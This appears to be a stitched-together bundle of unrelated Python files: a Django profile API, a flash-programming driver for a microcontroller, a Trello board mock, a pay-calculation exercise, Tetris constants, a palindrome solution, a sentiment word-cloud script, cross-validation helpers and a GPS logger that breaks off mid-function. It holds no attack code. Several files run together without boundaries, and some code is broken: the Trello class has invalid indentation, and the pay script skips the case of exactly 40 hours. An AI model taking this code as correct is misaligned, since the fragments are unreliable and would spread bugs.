        user_id = request.query_params.get('user_id', None)
        consumer = Profile.objects.get(user__id=user_id)
        serializer = ProfileSerializer(consumer)
        return Response(serializer.data)

    def put(self, request, format=None):
        # Full update of the profile row identified by request.data['id'].
        consumer = Profile.objects.get(id=request.data['id'])
        serializer = ProfileSerializer(consumer, data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data, status=status.HTTP_201_CREATED)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class UserFilterAPI(generics.ListAPIView):
    """List users with exact filtering on ?profile__organization= and
    ?type=, plus ?search= matching against full_name."""
    queryset = User.objects.all()
    serializer_class = UserSerializer
    filter_backends = [filters.SearchFilter, DjangoFilterBackend]
    filterset_fields = ['profile__organization', 'type']
    search_fields = ['full_name']
|
"""
mbed CMSIS-DAP debugger
Copyright (c) 2006-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from flash import Flash
flash_algo = { 'load_address' : 0x20000000,
'instructions' : [
0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
0x47702000, 0x47702000, 0x4c26b570, 0x60602002, 0x60e02001, 0x68284d24, 0xd00207c0L, 0x60602000,
0xf000bd70L, 0xe7f6f82cL, 0x4c1eb570, 0x60612102, 0x4288491e, 0x2001d302, 0xe0006160L, 0x4d1a60a0,
0xf81df000L, 0x7c06828, 0x2000d0fa, 0xbd706060L, 0x4605b5f8, 0x4813088e, 0x46142101, 0x4f126041,
0xc501cc01L, 0x7c06838, 0x1e76d006, 0x480dd1f8, 0x60412100, 0xbdf84608L, 0xf801f000L, 0x480ce7f2,
0x6006840, 0xd00b0e00L, 0x6849490a, 0xd0072900L, 0x4a0a4909, 0xd00007c3L, 0x1d09600a, 0xd1f90840L,
0x4770, 0x4001e500, 0x4001e400, 0x10001000, 0x40010400, 0x40010500, 0x40010600, 0x6e524635,
0x0],
'pc_init' : 0x20000021,
'pc_eraseAll' : 0x20000029,
'pc_program_page' : 0x20000071,
'begin_data' : 0x20000200,
'begin_stack' : 0x20001000,
'static_base' : 0x20000170,
'page_size' : 512
};
class Flash_nrf51822(Flash):
    """Flash-programming driver for the Nordic nRF51822, backed by the
    CMSIS-DAP flash algorithm blob defined above (flash_algo)."""

    def __init__(self, target):
        super(Flash_nrf51822, self).__init__(target, flash_algo)
|
# -*- coding: utf-8 -*-
from uuid import uuid4
import trello.board as board
from .trellolist import List
from .label import Label
class Board(board.Board):
def __init__(self, client=None, board_id=None, organization=None, name=''):
    """In-memory Trello board: state lives locally, not behind the API."""
    super().__init__(client, board_id, organization, name)
    self.lists = []    # List objects created via add_list()
    self.labels = {}   # label id -> Label, managed by add_label/delete_label
    # These ones were set in fetch operation
    self.description = None
    self.closed = False
    self.url = None
def fetch(self):
    """Not supported: this offline board has no remote state to fetch."""
    raise NotImplementedError()
def save(self):
    """No-op. In this version changes always are synced immediately."""
    pass
def set_name(self, name):
    """Rename the board."""
    self.name = name
def set_description(self, desc):
    """Replace the board description."""
    self.description = desc
def close(self):
    """Mark the board as closed (archived)."""
    self.closed = True
def open(self):
    """Re-open a closed board."""
    self.closed = False
def get_list(self, list_id):
    """Delegate list lookup by id to the owning client."""
    return self.client.get_list(list_id)
def get_lists(self, list_filter):
    """Get lists from filter

    :list_filter: one of 'all', 'open', 'closed'
    :rtype: list of List
    """
    # TODO check default return value if board is empty
    if list_filter == 'all':
        return self.lists
    if list_filter in ('open', 'closed'):
        # TODO filtering by open/closed state is not implemented yet
        raise NotImplementedError()
    # TODO Check what trello does here
    raise ValueError('Invalid List Filter: ' + list_filter)
def get_labels(self, fields='all', limit=50):
    """Get label

    :rtype: list of Label
    """
    # TODO fields pending
    # `fields` and `limit` are currently ignored; all labels are returned.
    return list(self.labels.values())
def get_checklists(self, cards='all'):
    """Get checklists

    :rtype: list of Checklist
    """
    # Checklists are not supported by this in-memory implementation.
    raise NotImplementedError()
def add_list(self, name, pos=None):
"""Add a list to this board
:name: name for the list
:pos: position of the list: "bottom", "top" or a positive number
:return: the list
:rtype: List
"""
# TODO pending to manage the position of the list
list = List(self, list_id=str(uuid4()), name=name)
list.pos = pos
self.client.add_list(list)
self.lists.append(list)
return list
def add_label(self, name, color):
"""Add a label to this board
:name: name of the label
:color: the color, either green, yellow, orange
red, purple, blue, sky, lime, pink, or black
:return: the label
:rtype: Label
"""
label = Label(self.client, str(uuid4()), name, color)
self.labels[label.id] = label
return label
def delete_label(self, label_id):
"""Delete a label from this board
:label_id: the ID of the label to delete.
:return: the label
:rtype: json
"""
# TODO review trello behaviour, probably if the label doesn't exist an exception is rised
return self.labels.pop(label_id, None)
def all_cards(self):
"""Returns all cards on this board
:rtype: list of Card
"""
filters = {
'filter': 'all',
'fields': 'all'
}
return self.get_cards(filters)
def open_cards(self):
"""Returns all open cards on this board
:rtype: list of Card
"""
filters = {
'filter': 'open',
'fields': 'all'
}
return self.get_cards(filters)
def closed_cards(self):
"""Returns all closed cards on this board
:rtype: list of Card
"""
filters = {
'filter': 'closed',
'fields': 'all'
}
return self.get_cards(filters)
def get_cards(self, filters=None, card_filter=""):
"""
:filters: dict containing query parameters. Eg. {'fields': 'all'}
:card_filter: filters on card status ('open', 'closed', 'all')
More info on card queries:
https://trello.com/docs/api/board/index.html#get-1-boards-board-id-cards
:rtype: list of Card
"""
# TODO
raise NotImplementedError()
def get_members(self, filters=None):
"""Get members with filter
:filters: dict containing query parameters.
Eg. {'fields': 'all', 'filter': 'admins'}
More info on possible filters:
https://developers.trello.com/advanced-reference/board#get-1-boards-board-id-members
:rtype: list of Member
"""
raise NotImplementedError()
# Add a member to a board
def add_member(self, member, member_type="normal"):
raise NotImplementedError()
# Removes an existing member of a board
def remove_member(self, member):
raise NotImplementedError()
def fetch_actions(self, action_filter, action_limit=50, before=None, since=None):
"""Returns all actions that conform to the given filters.
:action_filter: str of possible actions separated by comma
ie. 'createCard,updateCard'
:action_limit: int of max items returned
:before: datetime obj
:since: datetime obj
More info on action filter values:
https://developers.trello.com/advanced-reference/board#get-1-boards-board-id-actions
:rtype: json list of past actions
"""
raise NotImplementedError()
def get_last_activity(self):
"""Return the date of the last action done on the board.
:rtype: datetime.datetime
"""
# TODO
return []
|
'''
Write your pay computation to give the employee 1.5 times the
hourly rate for hours worked above 40 hours.
Enter Hours: 45
Enter Rate: 10
Pay: 475.0
'''
hrs = raw_input("Enter Hours:")
h = float(hrs)
rate = raw_input("Enter Hourly Rate:")
r = float(rate)
if (h<40) :
pay=h*r
print "Pay:", pay
elif (h>40) :
pay=40*r+1.5*r*(h-40)
print "Pay:", pay
|
import collections
import enum
# This file provides constants of game (windows size, colours within game, shape of tetrominos etc.)
# Window size, recommended minimum resolution is 500x720
# Window dimensions in pixels.
SCREEN_WIDTH = 500
SCREEN_HEIGHT = 720
# Number of rows and columns in gameboard - where tetrominos fall:
# The original tetris has 22 rows and 10 columns (remember of borders - left, right and bottom!)
BOARD_COLUMNS = 10 + 2 # +2 stands for left and right border lines
BOARD_ROWS = 22 + 1 # +1 stands for the bottom border line
# Colors used within game to draw, you can simply add your favorite color and use it within game
class Color(enum.Enum):
    """Make human-readable aliases of colors used in game (RGB tuples)."""
    # NOTE(review): several RGB values do not match their names - e.g. DARKRED
    # (186, 202, 239) is a pale blue and LIGHTBLUE (243, 144, 15) is orange.
    # This looks like a deliberate re-theme that kept the old names; confirm
    # before relying on the names for actual colors.
    BLACK = (81, 70, 90)
    DARKRED = (186, 202, 239)
    # LIGHTBLUE = (173, 216, 230)
    LIGHTBLUE = (243, 144, 15) # tetromino
    ORANGE = (252, 178, 81)
    RED = (198, 162, 226)
# Cell states used in the gameboard matrix.
BORDER_BLOCK = -1
BUFFER_BLOCK = 1
EMPTY_BLOCK = 0
FALLEN_BLOCK = 2
# For calculating points within Evaluator
POINTS_HEIGHT = 5
POINTS_GAP = 10
# Sizes within game:
BLOCK_SIZE = 18 # (in pixels) single block of tetromino/gameboard
# NOTE(review): the two comments below appear swapped relative to the
# formulas - "+1 bottom border row" wording fits the ROWS formula and
# "+2 left/right borders" fits the COLUMNS formula. The arithmetic is kept
# as-is; confirm the intended extra column/rows.
BOARD_WIDTH = BLOCK_SIZE * (BOARD_COLUMNS+1)
BOARD_HEIGHT = BLOCK_SIZE * (BOARD_ROWS+2)
Gameboard_coords_on_screen = collections.namedtuple('Gameboard_coords_on_screen', ['top', 'left'])
# For drawing gameboard with borders around.
# NOTE(review): 'top' is computed from widths and 'left' from heights - the
# field names look transposed, but callers may rely on this; verify before
# renaming.
BOARD_WITH_BORDER_COORDS = Gameboard_coords_on_screen(
    top=(SCREEN_WIDTH / 2 - BOARD_WIDTH / 2),
    left=(SCREEN_HEIGHT / 2 - BOARD_HEIGHT / 2),
)
# For the actual gameboard - when tetromino falls etc.
GAME_BOARD_COORDS = Gameboard_coords_on_screen(
    top=BOARD_WITH_BORDER_COORDS.top,
    left=BOARD_WITH_BORDER_COORDS.left + BLOCK_SIZE,
)
GAME_SINGLE_FRAME_SEC = 0.001 # interval between single steps
TIME_STEPS_TO_FALL_BUFFER = 200 # how many steps is needed to fall tetromino one block down
# 4x4 occupancy grids for the seven standard tetrominoes, keyed by their
# conventional letter names. 1 = filled cell, 0 = empty.
TETROMINO_SHAPES = {
    "I": [
        [0, 0, 1, 0],
        [0, 0, 1, 0],
        [0, 0, 1, 0],
        [0, 0, 1, 0],
    ],
    "Z": [
        [0, 0, 0, 0],
        [0, 1, 1, 0],
        [0, 0, 1, 1],
        [0, 0, 0, 0],
    ],
    "S": [
        [0, 0, 0, 0],
        [0, 1, 1, 0],
        [1, 1, 0, 0],
        [0, 0, 0, 0],
    ],
    "J": [
        [0, 0, 0, 0],
        [0, 1, 0, 0],
        [0, 1, 1, 1],
        [0, 0, 0, 0],
    ],
    "L": [
        [0, 0, 0, 0],
        [0, 0, 0, 1],
        [0, 1, 1, 1],
        [0, 0, 0, 0],
    ],
    "T": [
        [0, 0, 0, 0],
        [0, 0, 1, 0],
        [0, 1, 1, 1],
        [0, 0, 0, 0],
    ],
    "O": [
        [0, 0, 0, 0],
        [0, 1, 1, 0],
        [0, 1, 1, 0],
        [0, 0, 0, 0],
    ],
}
# NOTE(review): semantics of this level constant are not visible here -
# presumably how aggressive the piece generator is; confirm at the usage site.
MALICIOUS_LEVEL = 9
|
#! /usr/bin/python
'''
Palindrome Number
Determine whether an integer is a palindrome. Do this without extra space.
click to show spoilers.
Some hints:
Could negative integers be palindromes? (ie, -1)
If you are thinking of converting the integer to string, note the restriction of using extra space.
You could also try reversing an integer. However, if you have solved the problem "Reverse Integer", you know that the reversed integer might overflow. How would you handle such case?
There is a more generic way of solving this problem.
https://oj.leetcode.com/problems/palindrome-number/
'''
import re
class Solution:
    # @return a boolean
    # "No extra space" here means O(1) auxiliary space, not literally none.
    def isPalindrome(self, x):
        """Return True if integer x reads the same forwards and backwards.

        Compares the outermost digits and works inwards using only O(1)
        extra space (no string conversion). Negative numbers are not
        palindromes by definition.
        """
        if x < 0:
            return False
        # div becomes the power of ten aligned with x's most significant digit.
        # Floor division (//) keeps this correct on Python 3 as well.
        div = 1
        while x // div >= 10:
            div *= 10
        while x > 0 and div > 1:
            right = x % 10
            left = (x // div) % 10
            if right != left:
                return False
            # Drop the lowest digit; div shrinks twice as fast because one
            # digit is removed from each end per iteration.
            x //= 10
            div //= 100
        return True

    def isPalindrome_1(self, x):
        """String-based variant: x is a string; non-alphanumerics are stripped.

        Fixes two defects in the original: `else return False` was a
        SyntaxError, and comparing against `reversed(x)` (an iterator) was
        always False - compare with the reversed string x[::-1] instead.
        """
        x = re.sub('[^A-Z|a-z|0-9]','',x)
        return x == x[::-1]
if __name__ == "__main__":
    # Smoke test: 1200021 is a palindrome, so this prints True.
    # print() call form works on both Python 2 (single argument) and 3.
    s = Solution()
    print(s.isPalindrome(1200021))
|
# coding=utf-8
from nltk.corpus import stopwords
from textblob import TextBlob
import pandas as pd
import numpy as np
from nltk.stem import PorterStemmer
from nltk.corpus import stopwords
import requests
from translate import traducir
from wordcloud import WordCloud,STOPWORDS
import matplotlib.pyplot as plt
import unicodedata
import matplotlib.pyplot as plt
# Load the labelled suggestions and split them by sentiment class.
datos = pd.read_csv('datos_sentimientos.csv')
datos_pos = datos[ datos['sentimiento'] == 'positivo']
datos_cloud_pos = datos_pos['sugerencia_es']
datos_neg = datos[ datos['sentimiento'] == 'negativo']
datos_cloud_neg = datos_neg['sugerencia_es']
datos_plot_pos = datos_pos['sentiment_value']
datos_plot_neg = datos_neg['sentiment_value']
# Scatter plot of positive (green triangles) vs negative (red squares) scores.
plt.plot(datos_plot_pos, 'g^', datos_plot_neg, 'rs')
#plt.axis([0, 200, -1, 2])
plt.show()
# Build the stopword list for the word clouds: Spanish stopwords plus
# frequent bigram/filler tokens specific to this corpus.
stopwordsList = stopwords.words('spanish')
newStopWords = ['a_la','de_la','de_lo','en_el','por_la','en_la','con_la','para_que','que_no','que_el','para_la','ya_que','a_los','que_se',
                'en_el','me', 'se', 'mas', 'que_la', 'que_lo', 'a_las', 'para_los', 'que_es', 'y_que', 'de_que', 'de_las',
                'en_las', 'y_de', 'lo_que', 'ya_sea', 'para_el', 'y_no' , 'en_las', 'deberia', 'deberian']
stopwordsList.extend(newStopWords)
def wordcloud_draw(data, color = 'black'):
    """Render a word cloud for the given iterable of texts.

    Tokens that look like links ('http' anywhere), mentions ('@...'),
    hashtags ('#...') or retweet markers ('RT') are filtered out before
    the cloud is generated; the module-level stopword list is applied too.
    """
    tokens = " ".join(data).split(" ")
    kept = []
    for token in tokens:
        # drop noise tokens, keep everything else verbatim
        if 'http' in token:
            continue
        if token.startswith('@') or token.startswith('#'):
            continue
        if token == 'RT':
            continue
        kept.append(token)
    cloud = WordCloud(stopwords=stopwordsList,
                      background_color=color,
                      width=2500,
                      height=2000,
                      normalize_plurals=True
                      ).generate(" ".join(kept))
    plt.figure(1, figsize=(13, 13))
    plt.imshow(cloud)
    plt.axis('off')
    plt.show()
# Draw the cloud for positive suggestions; the negative one is disabled.
print("Positive words")
wordcloud_draw(datos_cloud_pos,'white')
print("Negative words")
#wordcloud_draw(datos_cloud_neg)
#print train_pos
#print train
|
# -*- coding: utf-8 -*-
import numpy as np
from build_polynomial import build_poly
from costs import compute_mse_loss
def split_data(x, y, ratio, seed=1):
    """Randomly split (x, y) into train/test parts.

    The first `ratio` fraction of a seeded random permutation becomes the
    training set, the remainder the test set.
    Returns (x_tr, y_tr, x_te, y_te).
    """
    np.random.seed(seed)
    shuffled = np.random.permutation(len(x))
    cut = int(ratio * len(x))
    train_idx, test_idx = shuffled[:cut], shuffled[cut:]
    return x[train_idx], y[train_idx], x[test_idx], y[test_idx]
def build_k_indices(y, k_fold, seed):
    """Build k equally-sized groups of shuffled row indices for k-fold CV.

    Returns a (k_fold, n//k_fold) integer array; any leftover rows beyond
    k_fold * (n // k_fold) are dropped.
    """
    fold_size = y.shape[0] // k_fold
    np.random.seed(seed)
    shuffled = np.random.permutation(y.shape[0])
    folds = [shuffled[fold * fold_size:(fold + 1) * fold_size]
             for fold in range(k_fold)]
    return np.array(folds)
def cross_validation(y, x, k_indices, k, lambda_, degree, cross_features_degree,
                     compute_weightsFunction, compute_lossFunction):
    """Run one fold of k-fold cross validation.

    Fold `k` is held out as the test set and the remaining folds form the
    training set. Polynomial features up to `degree` (plus cross features up
    to `cross_features_degree`) are built, weights are fitted on the training
    split only, and the losses of both splits are returned as
    (loss_tr, loss_te).
    """
    # held-out fold vs. everything else
    te_idx = k_indices[k]
    tr_idx = np.concatenate((k_indices[:k].ravel(), k_indices[k + 1:].ravel()))
    # split the raw data
    x_train, y_train = x[tr_idx], y[tr_idx]
    x_test, y_test = x[te_idx], y[te_idx]
    # expand features polynomially
    phi_train = build_poly(x_train, degree, cross_features_degree)
    phi_test = build_poly(x_test, degree, cross_features_degree)
    # fit on the training split only
    w = compute_weightsFunction(y_train, phi_train, lambda_)
    # evaluate both splits (losses computed without the regularizer)
    loss_tr = compute_lossFunction(y_train, phi_train, w)
    loss_te = compute_lossFunction(y_test, phi_test, w)
    return loss_tr, loss_te
def k_cross_validation(y, x, k_fold, lambda_, degree, cross_features_degree, seed,
                       compute_weightsFunction, compute_lossFunction):
    """Full k-fold cross validation.

    Shuffles the data into `k_fold` groups using `seed`, runs one
    cross_validation pass per fold, and returns the RMSE of the mean
    training/testing losses as (rmse_tr, rmse_te). Usually only the
    testing error is of interest.
    """
    k_indices = build_k_indices(y, k_fold, seed)
    # one (loss_tr, loss_te) pair per fold
    fold_losses = [
        cross_validation(y, x, k_indices, fold, lambda_, degree, cross_features_degree,
                         compute_weightsFunction=compute_weightsFunction,
                         compute_lossFunction=compute_lossFunction)
        for fold in range(k_fold)
    ]
    losses_tr = [tr for tr, _ in fold_losses]
    losses_te = [te for _, te in fold_losses]
    # rmse = sqrt(2 * mean mse), averaged over the folds
    rmse_tr = np.sqrt(2 * np.mean(losses_tr))
    rmse_te = np.sqrt(2 * np.mean(losses_te))
    return (rmse_tr, rmse_te)
import numpy as np
# Small NumPy broadcasting demo: per-row sums of a nutrition-style matrix.
A = np.array([[56.0, 0.0, 4.4, 68.0],
              [1.2, 104.0, 52.0, 8.0],
              [1.8, 135.0, 99.0, 0.9]])
#print(A)
cal = A.sum(axis = 1, keepdims = True) #axis = 0: sum down columns; axis = 1: sum across rows
print(cal)
#percentage = 100*A/cal.reshape(1,4)
#print(percentage)
import time
import board
import busio
import math
import array
import sys
import struct
from adafruit_binascii import hexlify
import os
import microcontroller
import digitalio
import analogio
import rtc
# Give the hardware a moment to settle after power-up.
time.sleep(1)
# Read the sense pin on A2: a voltage above ~2 V means USB power is present,
# in which case the logger refuses to run (see the matching check in boot.py).
analogin = analogio.AnalogIn(board.A2)
voltage = (analogin.value * 3.3) / 65536
if voltage > 2:
    print('not executing the code with USB connected') # has to also be changed in boot.py
    # to execute the code in USB mode
    sys.exit()
RX = board.RX
TX = board.TX
# Open the GPS UART at the u-blox default 9600 baud first...
uart_gps = busio.UART(TX, RX, baudrate=9600, timeout=1, receiver_buffer_size=128)
# ...then command the receiver to switch to 38400 baud (UBX CFG-PRT frame,
# sent twice; the second copy compensates for possible loss of the first).
Change_uart_baudrate_38400 = bytes ([
0xB5, 0x62, 0x06, 0x00, 0x14, 0x00, 0x01, 0x00, 0x00, 0x00, 0xD0, 0x08, 0x00, 0x00, 0x00, 0x96,
0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8B, 0x54, #CFG-PRT
0xB5, 0x62, 0x06, 0x00, 0x14, 0x00, 0x01, 0x00, 0x00, 0x00, 0xD0, 0x08, 0x00, 0x00, 0x00, 0x96,
0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8B, 0x54, #CFG-PRT
])
uart_gps.write(Change_uart_baudrate_38400)
time.sleep(1)
# Reopen the UART at the new baud rate.
uart_gps.deinit()
uart_gps = busio.UART(TX, RX, baudrate=38400, timeout=1)
class RTC(object):
    """Fallback time source that always reports one fixed timestamp.

    Used as a placeholder until the real-time clock is synced from GPS.
    """
    @property
    def datetime(self):
        # Arbitrary fixed date: 2018-03-17 21:01:47.
        fixed = (2018, 3, 17, 21, 1, 47, 0, 0, 0)
        return time.struct_time(fixed)
class UbxStream():
    """Minimal parser for u-blox UBX frames read from a UART.

    Only the NAV-PVT (class 0x01, id 0x07) message is decoded; its fields
    are exposed as attributes after a successful read().
    """
    def __init__(self, uart):
        # pyserial 3.x has min requirement python2.7
        # read() returns string in 2.7, bytes object otherwise
        # 98 bytes = class(1) + id(1) + length(2) + NAV-PVT payload(92) + checksum(2)
        self.buff = bytearray(98)
        self._uart = uart
        # UBX frames start with the sync bytes 0xB5 0x62 (compared as hex strings)
        self._ubox_synch = ['b5', '62']
        # Decoded NAV-PVT fields; empty strings until the first successful parse.
        self.iTOW = self.year = self.month = self.day = self.hour = self.minute = ""
        self.second = self.valid = self.tAcc = self.nano = self.fixType = self.flags = ""
        self.flags2 = self.numSV = self.lon = self.lat = self.height = self.hMSL = self.hAcc = ""
        self.vAcc = self.velN = self.velE = self.velD = self.gSpeed = self.headMot = self.sAcc = ""
        self.headAcc = self.pDOP = self.headVeh = self.magDec = self.magAcc = ""

    def read(self, timeout=1, reset=True):
        """Scan the UART for one UBX frame; decode it if it is NAV-PVT.

        Returns True on a successfully parsed NAV-PVT, otherwise None/False.
        """
        if(reset):
            # Drop stale bytes so we parse a fresh frame.
            self._uart.reset_input_buffer()
        s1 = self._uart.read(1)
        if not s1 == None:
            s1 = hexlify(s1).decode('utf-8')
            if s1 == self._ubox_synch[0]:
                s2 = self._uart.read(1)
                s2 = hexlify(s2).decode('utf-8')
                if s2 == self._ubox_synch[1]:
                    # Both sync bytes seen: read the rest of the frame.
                    self._uart.readinto(self.buff)
                    ubx_class = hexlify(bytes([self.buff[0]])).decode('utf-8')
                    if ubx_class == '01':
                        ubx_id = hexlify(bytes([self.buff[1]])).decode('utf-8')
                        if ubx_id == '07':
                            return self.ubx_NAV_PVT()

    def ubx_NAV_PVT(self):
        """Validate and unpack the buffered NAV-PVT payload into attributes.

        Returns True when the checksum matches, False otherwise.
        """
        if(self.validate_checksum(1, 7, self.buff)):
            # Payload starts after class/id/length (4 bytes).
            buff_cpy = self.buff[4:96]
            self.iTOW, self.year, self.month, self.day, self.hour, self.minute, self.second, self.valid, self.tAcc, self.nano, self.fixType, self.flags, self.flags2, self.numSV, self.lon, self.lat, self.height, self.hMSL, self.hAcc, self.vAcc, self.velN, self.velE, self.velD, self.gSpeed, self.headMot, self.sAcc, self.headAcc, self.pDOP, reserved11, reserved12, reserved13, reserved14, reserved15, reserved16, self.headVeh, self.magDec, self.magAcc = struct.unpack('LH5BBLlB2BB4l2L5lLLH6BlhH', buff_cpy)
            self.ubx_class = '01'
            self.ubx_id = '07'
            return True
        else:
            return False

    def validate_checksum(self, ubx_class, ubx_id, buff):
        """8-bit Fletcher checksum over class/id/length/payload (buff[0:96]).

        The two running sums must equal the checksum bytes at buff[96:98].
        The ubx_class/ubx_id parameters are currently unused.
        """
        check1 = 0
        check2 = 0
        chk1 = buff[96]
        chk2 = buff[97]
        for i in range(0, len(buff)-2):
            check1 = (check1 + buff[i]) % 256
            check2 = (check1 + check2) % 256
        if chk1==check1 and chk2==check2:
            return True
        else:
            return False
# Module-level parser instance shared by setup()/create_file()/loop().
uBX_nav_pvt_msg = UbxStream(uart_gps)
# Path of the CSV log file; set by create_file(), consumed by loop().
filefullpath = ''
############################################################
##################### START OF THE SETUP ###################
############################################################
def setup():
    """Configure the u-blox receiver over UART.

    Disables all NMEA sentences and unwanted UBX messages, enables the
    NAV-PVT message, and sets the navigation model / 5 Hz update rate.
    Each command is sent twice in case the first copy is lost.
    (The original also created an unused local UbxStream here; that dead
    assignment has been removed - the module-level instance is used.)
    """
    Disable_NMEA = bytes ([
        0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0xF0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x24, # GxGGA
        0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0xF0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x2B, # GxGLL
        0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0xF0, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x02, 0x32, # GxGSA
        0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0xF0, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x03, 0x39, # GxGSV
        0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0xF0, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x04, 0x40, # GxRMC
        0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0xF0, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x05, 0x47, # GxVTG
        0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0xF0, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x05, 0x47, # GxVTG
    ])
    uart_gps.write(Disable_NMEA)
    time.sleep(1)
    Disable_UBX = bytes ([
        0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0xB9, #NAV-POSLLH
        0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0x01, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0xC0, #NAV-STATUS
        0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0x01, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0xC0, #NAV-STATUS
    ])
    uart_gps.write(Disable_UBX)
    time.sleep(1)
    Enable_UBX = bytes ([
        0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0x01, 0x07, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x18, 0xE1, #NAV-PVT
        0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0x01, 0x07, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x18, 0xE1, #NAV-PVT
    ])
    uart_gps.write(Enable_UBX)
    time.sleep(1)
    commands2 = bytes ([
        #0xB5, 0x62, 0x06, 0x08, 0x06, 0x00, 0x64, 0x00, 0x01, 0x00, 0x01, 0x00, 0x7A, 0x12, #(10Hz)
        0xB5, 0x62, 0x06, 0x24, 0x24, 0x00, 0x01, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xb4,
        0xB5, 0x62, 0x06, 0x24, 0x24, 0x00, 0x01, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xb4,
        0xB5, 0x62, 0x06, 0x08, 0x06, 0x00, 0xC8, 0x00, 0x01, 0x00, 0x01, 0x00, 0xDE, 0x6A, #(5Hz)
        0xB5, 0x62, 0x06, 0x08, 0x06, 0x00, 0xC8, 0x00, 0x01, 0x00, 0x01, 0x00, 0xDE, 0x6A, #(5Hz)
    ])
    uart_gps.write(commands2)
def create_file ():
    """Wait for a good GPS fix, sync the RTC, and create the CSV log file.

    Blocks until a NAV-PVT message with more than 6 satellites is parsed,
    then derives a folder name (date) and file name (time) from the GPS
    timestamp, writes the FlySight-style CSV header, and stores the full
    path in the module-level `filefullpath` for loop() to append to.
    """
    global filefullpath
    while True:
        print(uBX_nav_pvt_msg.numSV)
        if uBX_nav_pvt_msg.read() and uBX_nav_pvt_msg.numSV > 6:
            foldername = '/{:02d}-{:02d}-{:02d}'.format(uBX_nav_pvt_msg.year - 2000,uBX_nav_pvt_msg.month,uBX_nav_pvt_msg.day)
            filename = '{:02d}-{:02d}-{:02d}.csv'.format(uBX_nav_pvt_msg.hour,uBX_nav_pvt_msg.minute,uBX_nav_pvt_msg.second)
            # Sync the on-board RTC to GPS time so later timestamps are correct.
            date = time.struct_time((uBX_nav_pvt_msg.year, uBX_nav_pvt_msg.month, uBX_nav_pvt_msg.day,
                                     uBX_nav_pvt_msg.hour, uBX_nav_pvt_msg.minute, uBX_nav_pvt_msg.second,0,-1,-1))
            my_rtc = rtc.RTC()
            my_rtc.datetime = date
            rtc.set_time_source(my_rtc)
            try:
                os.mkdir(foldername)
                print('folder created')
            except OSError:
                # Narrowed from a bare except: mkdir raises OSError when the
                # directory already exists; reuse it in that case.
                print('folder already exist')
            os.chdir(foldername)
            with open(filename, "a") as f:
                f.write('time,lat,lon,hMSL,velN,velE,velD,hAcc,vAcc,sAcc,heading,cAcc,gpsFix,numSV\n')
                f.write(',(deg),(deg),(m),(m/s),(m/s),(m/s),(m),(m),(m/s),(deg),(deg),,\n')
            # BUG FIX: the original joined with a literal backslash
            # ('{}\{}'), producing a bogus filename on CircuitPython's
            # '/'-separated filesystem, so loop() appended to a different
            # file than the one created above.
            filefullpath = '{}/{}'.format(foldername,filename)
            return
############################################################
##################### START OF THE LOOP ####################
############################################################
def loop():
    """Main logging loop: append one FlySight-style CSV row per NAV-PVT fix.

    Logging starts immediately; a jump is detected when vertical speed
    leaves the +/-2 m/s band for more than 20 samples, and logging stops
    (file closed, loop exits) some time after the descent rate drops again.
    """
    create_file()
    global filefullpath
    FlySightString = ''
    bufferMilliseconds = ''
    # trigger flips to True once sustained vertical speed indicates a jump.
    trigger = False
    counter = 0
    with open(filefullpath, "a") as f:
        while True:
            if uBX_nav_pvt_msg.read():
                # nano is in nanoseconds; reduce to hundredths of a second.
                bufferMilliseconds = round(uBX_nav_pvt_msg.nano / 100000000)*10
                # Scale the raw NAV-PVT integer fields to degrees / metres /
                # metres-per-second for the CSV columns.
